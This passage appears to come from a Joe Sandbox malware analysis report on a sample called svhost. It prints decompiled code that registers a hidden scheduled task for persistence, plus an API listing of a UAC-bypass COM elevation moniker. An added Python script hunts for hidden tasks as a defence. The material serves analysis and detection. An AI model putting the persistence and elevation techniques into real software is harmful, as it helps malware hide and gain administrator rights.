                                      				char _v444;
                                      				char _v468;
                                      				char _v492;
                                      				signed int _t463;
                                      				signed int _t464;
                                      				signed int _t471;
                                      				signed int _t472;
                                      				intOrPtr* _t473;
                                      				intOrPtr* _t474;
                                      				intOrPtr* _t475;
                                      				intOrPtr* _t476;
                                      				intOrPtr* _t477;
                                      				intOrPtr* _t478;
                                      				intOrPtr* _t479;
                                      				intOrPtr* _t480;
                                      				signed int _t483;
                                      				signed int _t491;
                                      				signed int _t508;
                                      				signed int _t514;
                                      				signed int _t563;
                                      				signed int _t582;
                                      				intOrPtr* _t583;
                                      				intOrPtr* _t585;
                                      				intOrPtr* _t587;
                                      				void* _t638;
                                      				void* _t675;
                                      				void* _t688;
                                      				signed int _t701;
                                      				signed int _t707;
                                      				void* _t715;
                                      				intOrPtr* _t845;
                                      				intOrPtr* _t846;
                                      				intOrPtr* _t847;
                                      				signed int _t1034;
                                      				void* _t1035;
                                      				void* _t1036;
                                      				intOrPtr* _t1037;
                                      				intOrPtr* _t1038;
                                      				intOrPtr* _t1039;
                                      				intOrPtr* _t1040;
                                      				void* _t1043;
                                      				intOrPtr* _t1044;
                                      				intOrPtr* _t1045;
                                      
                                      				_t1033 = __esi;
                                      				_t1032 = __edi;
                                      				_t929 = __edx;
                                      				_t732 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec1930);
                                      				_push( *[fs:0x0]);
                                      				_t1036 = _t1035 - 0x1dc;
                                      				_t463 =  *0xeef074; // 0x221cac15
                                      				_t464 = _t463 ^ _t1034;
                                      				_v20 = _t464;
                                      				_push(_t464);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v132 = __ecx;
                                      				if((E00E579A0(_a4) & 0x000000ff) == 0 && _a8 != 0) {
                                      					E00E70340(__ebx, _v132, __edi, __esi, __eflags,  &_v44);
                                      					_t471 = E00E579A0( &_v44);
                                      					_t929 = _t471 & 0x000000ff;
                                      					__eflags = _t471 & 0x000000ff;
                                      					if((_t471 & 0x000000ff) == 0) {
                                      						__imp__CoInitializeEx(0, 0);
                                      						__eflags = _t471;
                                      						if(_t471 >= 0) {
                                      							__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0);
                                      							__eflags = _t471;
                                      							if(_t471 >= 0) {
                                      								_v56 = 0;
                                      								_t472 =  &_v56;
                                      								__imp__CoCreateInstance(0xec82ac, 0, 1, 0xec829c, _t472);
                                      								__eflags = _t472;
                                      								if(_t472 >= 0) {
                                      									_t473 = E00E6F630( &_v348);
                                      									_v188 =  *_t473;
                                      									_v184 =  *((intOrPtr*)(_t473 + 4));
                                      									_v180 =  *((intOrPtr*)(_t473 + 8));
                                      									_v176 =  *((intOrPtr*)(_t473 + 0xc));
                                      									_t474 = E00E6F630( &_v332);
                                      									_v204 =  *_t474;
                                      									_v200 =  *((intOrPtr*)(_t474 + 4));
                                      									_v196 =  *((intOrPtr*)(_t474 + 8));
                                      									_v192 =  *((intOrPtr*)(_t474 + 0xc));
                                      									_t475 = E00E6F630( &_v316);
                                      									_v220 =  *_t475;
                                      									_v216 =  *((intOrPtr*)(_t475 + 4));
                                      									_v212 =  *((intOrPtr*)(_t475 + 8));
                                      									_v208 =  *((intOrPtr*)(_t475 + 0xc));
                                      									_t476 = E00E6F630( &_v300);
                                      									_v236 =  *_t476;
                                      									_v232 =  *((intOrPtr*)(_t476 + 4));
                                      									_v228 =  *((intOrPtr*)(_t476 + 8));
                                      									_v224 =  *((intOrPtr*)(_t476 + 0xc));
                                      									_t1037 = _t1036 - 0x10;
                                      									_t477 = _t1037;
                                      									 *_t477 = _v188;
                                      									 *((intOrPtr*)(_t477 + 4)) = _v184;
                                      									 *((intOrPtr*)(_t477 + 8)) = _v180;
                                      									 *((intOrPtr*)(_t477 + 0xc)) = _v176;
                                      									_t1038 = _t1037 - 0x10;
                                      									_t478 = _t1038;
                                      									 *_t478 = _v204;
                                      									 *((intOrPtr*)(_t478 + 4)) = _v200;
                                      									 *((intOrPtr*)(_t478 + 8)) = _v196;
                                      									 *((intOrPtr*)(_t478 + 0xc)) = _v192;
                                      									_t1039 = _t1038 - 0x10;
                                      									_t479 = _t1039;
                                      									 *_t479 = _v220;
                                      									 *((intOrPtr*)(_t479 + 4)) = _v216;
                                      									 *((intOrPtr*)(_t479 + 8)) = _v212;
                                      									 *((intOrPtr*)(_t479 + 0xc)) = _v208;
                                      									_t1040 = _t1039 - 0x10;
                                      									_t480 = _t1040;
                                      									 *_t480 = _v236;
                                      									 *((intOrPtr*)(_t480 + 4)) = _v232;
                                      									 *((intOrPtr*)(_t480 + 8)) = _v228;
                                      									 *((intOrPtr*)(_t480 + 0xc)) = _v224;
                                      									_t483 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x28))))(_v56);
                                      									__eflags = _t483;
                                      									if(_t483 >= 0) {
                                      										_v136 = 0;
                                      									} else {
                                      										_v136 = 1;
                                      									}
                                      									_v102 = _v136;
                                      									E00E6F710( &_v300);
                                      									E00E6F710( &_v316);
                                      									E00E6F710( &_v332);
                                      									E00E6F710( &_v348);
                                      									__eflags = _v102 & 0x000000ff;
                                      									if((_v102 & 0x000000ff) == 0) {
                                      										_v52 = 0;
                                      										_t491 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x1c))))(_v56, E00E6F440(E00E6F380( &_v140, "\\")),  &_v52);
                                      										__eflags = _t491;
                                      										if(_t491 >= 0) {
                                      											_v128 = 0;
                                      										} else {
                                      											_v128 = 1;
                                      										}
                                      										_v104 = _v128;
                                      										E00E6F420( &_v140);
                                      										__eflags = _v104 & 0x000000ff;
                                      										if((_v104 & 0x000000ff) == 0) {
                                      											 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 0x3c))))(_v52, E00E6F440(E00E6F380( &_v144, E00E57A40())), 0);
                                      											E00E6F420( &_v144);
                                      											_v48 = 0;
                                      											_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x24))))(_v56, 0,  &_v48);
                                      											 *((intOrPtr*)( *((intOrPtr*)( *_v56 + 8))))(_v56);
                                      											__eflags = _v100;
                                      											if(_v100 >= 0) {
                                      												_v88 = 0;
                                      												_t508 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x1c))))(_v48,  &_v88);
                                      												__eflags = _t508;
                                      												if(_t508 >= 0) {
                                      													 *((intOrPtr*)( *((intOrPtr*)( *_v88 + 8))))(_v88);
                                      													__eflags = _v100;
                                      													if(_v100 >= 0) {
                                      														_v64 = 0;
                                      														_t514 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x24))))(_v48,  &_v64);
                                      														__eflags = _t514;
                                      														if(_t514 >= 0) {
                                      															_v68 = 0;
                                      															_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v64 + 0x28))))(_v64, 2,  &_v68);
                                      															 *((intOrPtr*)( *((intOrPtr*)( *_v64 + 8))))(_v64);
                                      															__eflags = _v100;
                                      															if(_v100 >= 0) {
                                      																_v60 = 0;
                                      																_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v68))))(_v68, 0xec828c,  &_v60);
                                      																 *((intOrPtr*)( *((intOrPtr*)( *_v68 + 8))))(_v68);
                                      																__eflags = _v100;
                                      																if(_v100 >= 0) {
                                      																	 *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x24))))(_v60, E00E6F440(E00E6F380( &_v148, L"Trigger1")));
                                      																	E00E6F420( &_v148);
                                      																	E00E70610(_t732, _v132, _t1032, _t1033,  &_v420, 1);
                                      																	 *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x3c))))(_v60, E00E6F440(E00E6F380( &_v152, E00E57A40())));
                                      																	E00E6F420( &_v152);
                                      																	E00E57B40( &_v420);
                                      																	_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x54))))(_v60, 1);
                                      																	__eflags = _v100;
                                      																	if(_v100 >= 0) {
                                      																		_v72 = 0;
                                      																		_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x28))))(_v60,  &_v72);
                                      																		_t807 = _v60;
                                      																		 *((intOrPtr*)( *((intOrPtr*)( *_v60 + 8))))(_v60);
                                      																		__eflags = _v100;
                                      																		if(__eflags >= 0) {
                                      																			E00E68360(_t732,  &_v468, _t1032, _t1033, __eflags,  &_v444, E00E70770(_t732,  &_v468, _t1032, _t1033, __eflags,  &_v468, L"PT", E00E6D560(_t807, __eflags,  &_v492, _a8)), "M");
                                      																			_t1043 = _t1040 + 0x20;
                                      																			_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v72 + 0x20))))(_v72, E00E6F440(E00E6F380( &_v156, E00E57A40())));
                                      																			E00E6F420( &_v156);
                                      																			E00E57B40( &_v444);
                                      																			E00E57B40( &_v468);
                                      																			E00E57B40( &_v492);
                                      																			 *((intOrPtr*)( *((intOrPtr*)( *_v72 + 8))))(_v72);
                                      																			__eflags = _v100;
                                      																			if(_v100 >= 0) {
                                      																				_v76 = 0;
                                       																				_t563 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x44))))(_v48,  &_v76); // vtable +0x44 on _v48: ITaskDefinition::get_Actions(&_v76) (method names in these comments are inferred from the Task Scheduler 2.0 vtable layout, not stated by the report)
                                       																				__eflags = _t563;
                                       																				if(_t563 >= 0) {
                                       																					_v80 = 0;
                                       																					_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v76 + 0x30))))(_v76, 0,  &_v80); // +0x30 on _v76: IActionCollection::Create(TASK_ACTION_EXEC = 0, &_v80)
                                       																					 *((intOrPtr*)( *((intOrPtr*)( *_v76 + 8))))(_v76); // +0x08: IUnknown::Release on the action collection
                                       																					__eflags = _v100;
                                       																					if(_v100 >= 0) {
                                       																						_v84 = 0;
                                       																						_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v80))))(_v80, 0xec82bc,  &_v84); // +0x00: IUnknown::QueryInterface(riid at 0xec82bc, &_v84); IExecAction is the interface the put_Path call below requires
                                       																						 *((intOrPtr*)( *((intOrPtr*)( *_v80 + 8))))(_v80); // +0x08: IUnknown::Release on the generic IAction
                                       																						__eflags = _v100;
                                       																						if(_v100 >= 0) {
                                       																							_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v84 + 0x2c))))(_v84, E00E6F440(E00E6F380( &_v160, E00E57A40()))); // +0x2c on _v84: IExecAction::put_Path(BSTR built from the string E00E57A40() returns)
                                       																							E00E6F420( &_v160);
                                       																							__eflags = _v100;
                                       																							if(_v100 >= 0) {
                                       																								_t582 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x2c))))(_v48,  &_v92); // +0x2c on _v48: ITaskDefinition::get_Settings(&_v92)
                                       																								__eflags = _t582;
                                       																								if(_t582 >= 0) {
                                       																									 *((intOrPtr*)( *((intOrPtr*)( *_v92 + 0x98))))(_v92, 0xffffffff); // +0x98 on _v92: ITaskSettings::put_Hidden(VARIANT_TRUE = 0xffffffff), so the task does not show in the Task Scheduler UI
                                       																									 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x30))))(_v48, _v92); // +0x30 on _v48: ITaskDefinition::put_Settings(_v92)
                                       																								}
                                      																								}
                                      																								_v96 = 0;
                                      																								_t583 = E00E6F6C0( &_v396, 0xee4dbc);
                                      																								_v252 =  *_t583;
                                      																								_v248 =  *((intOrPtr*)(_t583 + 4));
                                      																								_v244 =  *((intOrPtr*)(_t583 + 8));
                                      																								_v240 =  *((intOrPtr*)(_t583 + 0xc));
                                      																								_t585 = E00E6F650( &_v380, E00E6F2E0( &_v172, L""));
                                      																								_v268 =  *_t585;
                                      																								_v264 =  *((intOrPtr*)(_t585 + 4));
                                      																								_v260 =  *((intOrPtr*)(_t585 + 8));
                                      																								_v256 =  *((intOrPtr*)(_t585 + 0xc));
                                      																								_t587 = E00E6F650( &_v364, E00E6F2E0( &_v168, 0xed26b6));
                                      																								_v284 =  *_t587;
                                      																								_v280 =  *((intOrPtr*)(_t587 + 4));
                                      																								_v276 =  *((intOrPtr*)(_t587 + 8));
                                      																								_v272 =  *((intOrPtr*)(_t587 + 0xc));
                                      																								_t1044 = _t1043 - 0x10;
                                      																								_t845 = _t1044;
                                      																								 *_t845 = _v252;
                                      																								 *((intOrPtr*)(_t845 + 4)) = _v248;
                                      																								 *((intOrPtr*)(_t845 + 8)) = _v244;
                                      																								 *((intOrPtr*)(_t845 + 0xc)) = _v240;
                                      																								_t1045 = _t1044 - 0x10;
                                      																								_t846 = _t1045;
                                      																								 *_t846 = _v268;
                                      																								 *((intOrPtr*)(_t846 + 4)) = _v264;
                                      																								 *((intOrPtr*)(_t846 + 8)) = _v260;
                                      																								 *((intOrPtr*)(_t846 + 0xc)) = _v256;
                                      																								_t847 = _t1045 - 0x10;
                                      																								 *_t847 = _v284;
                                      																								 *((intOrPtr*)(_t847 + 4)) = _v280;
                                      																								 *((intOrPtr*)(_t847 + 8)) = _v276;
                                      																								 *((intOrPtr*)(_t847 + 0xc)) = _v272;
                                       																								_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v52 + 0x44))))(_v52, E00E6F440(E00E6F380( &_v164, E00E57A40())), _v48, 6, 0,  &_v96); // +0x44 on _v52: ITaskFolder::RegisterTaskDefinition(path, _v48 definition, flags 6 = TASK_CREATE_OR_UPDATE, userId, password, logonType, sddl, &_v96); the three 16-byte stack copies above are the VARIANT userId/password/sddl arguments the decompiler did not fold into the call (interface and method inferred from the Task Scheduler 2.0 vtable layout)
                                      																								E00E6F420( &_v164);
                                      																								E00E6F710( &_v364);
                                      																								E00E6F420( &_v168);
                                      																								E00E6F710( &_v380);
                                      																								E00E6F420( &_v172);
                                      																								E00E6F710( &_v396);
                                      																								__eflags = _v100;
                                      																								if(_v100 >= 0) {
                                      																									 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      																									 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
                                      																									_t929 =  *_v96;
                                      																									 *((intOrPtr*)( *((intOrPtr*)( *_v96 + 8))))(_v96);
                                      																									__imp__CoUninitialize();
                                      																									_v119 = 1;
                                      																									E00E57B40( &_v44);
                                      																								} else {
                                      																									 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      																									_t929 =  *_v48;
                                      																									 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
                                      																									__imp__CoUninitialize();
                                      																									_v118 = 0;
                                      																									E00E57B40( &_v44);
                                      																								}
                                      																							} else {
                                      																								 *((intOrPtr*)( *((intOrPtr*)( *_v84 + 8))))(_v84);
                                      																								 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      																								_t929 = _v48;
                                      																								 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
                                      																								__imp__CoUninitialize();
                                      																								_v117 = 0;
                                      																								E00E57B40( &_v44);
                                      																							}
                                      																						} else {
                                      																							 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      																							_t638 =  *_v48;
                                      																							_t929 =  *(_t638 + 8);
                                      																							 *( *(_t638 + 8))(_v48);
                                      																							__imp__CoUninitialize();
                                      																							_v116 = 0;
                                      																							E00E57B40( &_v44);
                                      																						}
                                      																					} else {
                                      																						 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      																						_t929 = _v48;
                                      																						 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
                                      																						__imp__CoUninitialize();
                                      																						_v115 = 0;
                                      																						E00E57B40( &_v44);
                                      																					}
                                      																				} else {
                                      																					 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      																					_t929 =  *_v48;
                                      																					 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
                                      																					__imp__CoUninitialize();
                                      																					_v114 = 0;
                                      																					E00E57B40( &_v44);
                                      																				}
                                      																			} else {
                                      																				 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      																				_t929 = _v48;
                                      																				 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
                                      																				__imp__CoUninitialize();
                                      																				_v113 = 0;
                                      																				E00E57B40( &_v44);
                                      																			}
                                      																		} else {
                                      																			 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      																			_t929 =  *_v48;
                                      																			 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
                                      																			__imp__CoUninitialize();
                                      																			_v112 = 0;
                                      																			E00E57B40( &_v44);
                                      																		}
                                      																	} else {
                                      																		 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      																		 *((intOrPtr*)( *((intOrPtr*)( *_v60 + 8))))(_v60);
                                      																		_t675 =  *_v48;
                                      																		_t929 =  *(_t675 + 8);
                                      																		 *( *(_t675 + 8))(_v48);
                                      																		__imp__CoUninitialize();
                                      																		_v111 = 0;
                                      																		E00E57B40( &_v44);
                                      																	}
                                      																} else {
                                      																	 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      																	_t929 =  *_v48;
                                      																	 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
                                      																	__imp__CoUninitialize();
                                      																	_v110 = 0;
                                      																	E00E57B40( &_v44);
                                      																}
                                      															} else {
                                      																 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      																_t688 =  *_v48;
                                      																_t929 =  *(_t688 + 8);
                                      																 *( *(_t688 + 8))(_v48);
                                      																__imp__CoUninitialize();
                                      																_v109 = 0;
                                      																E00E57B40( &_v44);
                                      															}
                                      														} else {
                                      															 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      															_t929 = _v48;
                                      															 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
                                      															__imp__CoUninitialize();
                                      															_v108 = 0;
                                      															E00E57B40( &_v44);
                                      														}
                                      													} else {
                                      														 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      														_t701 =  *_v48;
                                      														_t929 =  *(_t701 + 8);
                                      														 *( *(_t701 + 8))(_v48);
                                      														__imp__CoUninitialize();
                                      														_v107 = 0;
                                      														E00E57B40( &_v44);
                                      													}
                                      												} else {
                                      													 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      													_t707 =  *_v48;
                                      													_t929 =  *(_t707 + 8);
                                      													 *( *(_t707 + 8))(_v48);
                                      													__imp__CoUninitialize();
                                      													_v106 = 0;
                                      													E00E57B40( &_v44);
                                      												}
                                      											} else {
                                      												_t929 =  *_v52;
                                      												 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
                                      												__imp__CoUninitialize();
                                      												_v120 = 0;
                                      												E00E57B40( &_v44);
                                      											}
                                      										} else {
                                      											_t715 =  *_v56;
                                      											_t929 =  *(_t715 + 8);
                                      											 *( *(_t715 + 8))(_v56);
                                      											__imp__CoUninitialize();
                                      											_v105 = 0;
                                      											E00E57B40( &_v44);
                                      										}
                                      									} else {
                                      										_t929 = _v56;
                                      										 *((intOrPtr*)( *((intOrPtr*)( *_v56 + 8))))(_v56);
                                      										__imp__CoUninitialize();
                                      										_v103 = 0;
                                      										E00E57B40( &_v44);
                                      									}
                                      								} else {
                                      									__imp__CoUninitialize();
                                      									_v101 = 0;
                                      									E00E57B40( &_v44);
                                      								}
                                      							} else {
                                      								__imp__CoUninitialize();
                                      								_v123 = 0;
                                      								E00E57B40( &_v44);
                                      							}
                                      						} else {
                                      							_v122 = 0;
                                      							E00E57B40( &_v44);
                                      						}
                                      					} else {
                                      						_v121 = 0;
                                      						E00E57B40( &_v44);
                                      					}
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t732, _v20 ^ _t1034, _t929, _t1032, _t1033);
                                      			}
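Read by Task Scheduler 2.0 vtable offsets (an inference from the listing, not something the report states), the successful path through this function is get_Actions, IActionCollection::Create(TASK_ACTION_EXEC), IExecAction::put_Path, ITaskSettings::put_Hidden(VARIANT_TRUE), put_Settings and finally ITaskFolder::RegisterTaskDefinition with TASK_CREATE_OR_UPDATE. A task registered that way is persisted by the service as XML under %SystemRoot%\System32\Tasks, with put_Hidden appearing as `<Settings><Hidden>true</Hidden></Settings>` and put_Path as `<Actions><Exec><Command>`, so the persistence can be hunted offline from a mounted image as well as on the live host. The following Python is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses task XML and flags hidden tasks whose Exec command lies outside Windows or Program Files. The task names, authors and paths in SAMPLE_TASKS are constructed for the demonstration, and the trusted-prefix list is an assumption to tune per environment.

```python
"""Hunt for hidden scheduled tasks that launch binaries from untrusted paths.

Task definitions are persisted as XML under %SystemRoot%\\System32\\Tasks.
This parses them offline; no Task Scheduler API is needed.
"""
import xml.etree.ElementTree as ET
from pathlib import Path

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumption: hidden tasks launching from these roots are expected (many
# built-in Microsoft tasks are hidden). Anything else is flagged for review.
TRUSTED_PREFIXES = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Environment variables that built-in task definitions commonly use.
ENV_EXPANSIONS = {
    "%windir%": "c:\\windows",
    "%systemroot%": "c:\\windows",
    "%programfiles%": "c:\\program files",
}


def normalize_command(command):
    """Lower-case, strip surrounding quotes and expand the few env vars above."""
    cmd = command.strip().strip('"').lower()
    for var, value in ENV_EXPANSIONS.items():
        cmd = cmd.replace(var, value)
    return cmd


def parse_task(xml_data):
    """Extract the fields of one task XML document that matter for this hunt."""
    root = ET.fromstring(xml_data)
    hidden = root.findtext("t:Settings/t:Hidden", default="false", namespaces=TASK_NS)
    author = root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=TASK_NS)
    commands = [
        normalize_command(ex.findtext("t:Command", default="", namespaces=TASK_NS))
        for ex in root.findall("t:Actions/t:Exec", TASK_NS)
    ]
    return {"hidden": hidden.strip().lower() == "true",
            "author": author.strip(),
            "commands": commands}


def is_suspicious(task):
    """Hidden task with at least one Exec command outside the trusted roots."""
    if not task["hidden"]:
        return False
    return any(cmd and not cmd.startswith(TRUSTED_PREFIXES) for cmd in task["commands"])


def scan_task_xml(named_documents):
    """named_documents: iterable of (name, xml str or bytes). Returns flagged tasks."""
    findings = []
    for name, xml_data in named_documents:
        try:
            task = parse_task(xml_data)
        except ET.ParseError:
            continue  # not XML (or corrupt); the Tasks tree holds nothing else of interest
        if is_suspicious(task):
            findings.append((name, task["author"], task["commands"]))
    return findings


def scan_tasks_directory(tasks_dir):
    """Walk a Tasks directory (live host or mounted image). Files are usually
    UTF-16 with a BOM; passing bytes lets the parser honour the declaration."""
    docs = ((str(p), p.read_bytes()) for p in Path(tasks_dir).rglob("*") if p.is_file())
    return scan_task_xml(docs)


# Constructed sample documents (not taken from the analysed sample) for an offline run.
SAMPLE_TASKS = [
    ("\\Microsoft\\Windows\\Sample\\Cleanup", r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions><Exec><Command>%windir%\system32\cleanmgr.exe</Command></Exec></Actions>
</Task>"""),
    ("\\svhost", r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>WORKSTATION\user</Author></RegistrationInfo>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions><Exec><Command>"C:\Users\user\AppData\Roaming\svhost.exe"</Command></Exec></Actions>
</Task>"""),
    ("\\Updater", r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>WORKSTATION\user</Author></RegistrationInfo>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions><Exec><Command>C:\Users\user\AppData\Local\Updater\update.exe</Command></Exec></Actions>
</Task>"""),
]


if __name__ == "__main__":
    for name, author, commands in scan_task_xml(SAMPLE_TASKS):
        print(f"{name}: hidden task registered by {author!r} runs {commands}")
```

Only the second constructed task is reported: it is hidden and its command sits under a user profile. The first is hidden too but resolves under C:\Windows after expanding %windir%, and the third is not hidden at all. On a live host, `scan_tasks_directory(r"C:\Windows\System32\Tasks")` performs the same check over the real definitions; compare any hit against the task's registration time and the author SID before acting on it.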

Instruction listing for this function (addresses 0x00e6f730 through 0x00e7031c): only the address column survived extraction; the opcode and operand columns are not present in this copy of the page.
                                      0x00e6fa1b
                                      0x00e6f824
                                      0x00e6f824
                                      0x00e6f82a
                                      0x00e6f831
                                      0x00e6f836
                                      0x00e6f7e7
                                      0x00e6f7e7
                                      0x00e6f7ed
                                      0x00e6f7f4
                                      0x00e6f7f9
                                      0x00e6f7b7
                                      0x00e6f7b7
                                      0x00e6f7be
                                      0x00e6f7c3
                                      0x00e6f795
                                      0x00e6f795
                                      0x00e6f79c
                                      0x00e6f7a1
                                      0x00e6f793
                                      0x00e70327
                                      0x00e7033c

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6F761
                                      • std::ios_base::good.LIBCPMTD ref: 00E6F789
                                      • task.LIBCPMTD ref: 00E6F79C
                                      • CoInitializeEx.OLE32(00000000,00000000,?,221CAC15), ref: 00E6F7AD
                                      • task.LIBCPMTD ref: 00E6F7BE
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00E6F7DD
                                      • CoUninitialize.OLE32 ref: 00E6F7E7
                                      • task.LIBCPMTD ref: 00E6F7F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$Initializestd::ios_base::good$SecurityUninitialize
                                      • String ID: Trigger1
                                      • API String ID: 3657613080-1869269927
                                      • Opcode ID: 83cc277369762a5748a2bfa29323b78858cdddf270352da74808b9ff608781ef
                                      • Instruction ID: 40c2d88759c7932cf05eb4eb8a8b6be8c0b38b7bc0a51c11d3fffb448fa67f4e
                                      • Opcode Fuzzy Hash: 83cc277369762a5748a2bfa29323b78858cdddf270352da74808b9ff608781ef
                                      • Instruction Fuzzy Hash: 4592B874A14218DFCB14DFA8E894EDDB7B6BF88300F149199E519AB361DB30AD86CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00E70CBB
                                      • CLSIDFromString.OLE32({3E5FC7F9-9A51-4367-9063-A120244FBEC7},?), ref: 00E70CEF
                                      • IIDFromString.OLE32({6EDD6D74-C007-4E75-B76A-E5740995E24C},?), ref: 00E70D23
                                      • CoGetObject.OLE32(?,00000024,?,00000000), ref: 00E70DC4
                                      • task.LIBCPMTD ref: 00E70E24
                                      • CoUninitialize.OLE32 ref: 00E70E3D
                                      Strings
                                      • Elevation:Administrator!new:, xrefs: 00E70D47
                                      • {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00E70D60
                                      • {6EDD6D74-C007-4E75-B76A-E5740995E24C}, xrefs: 00E70D1E
                                      • $, xrefs: 00E70D8A
                                      • {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00E70CEA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FromString$InitializeObjectUninitializetask
                                      • String ID: $$Elevation:Administrator!new:${3E5FC7F9-9A51-4367-9063-A120244FBEC7}${3E5FC7F9-9A51-4367-9063-A120244FBEC7}${6EDD6D74-C007-4E75-B76A-E5740995E24C}
                                      • API String ID: 780495086-220260661
                                      • Opcode ID: d951cc5b706ff3fdffc3273f12f72aeccf58b7afee90d8467e6e5a35d7286264
                                      • Instruction ID: 6416fa7d7faad92523c7f609e07577538424f485126dc736ff3ec5a4066bf9b2
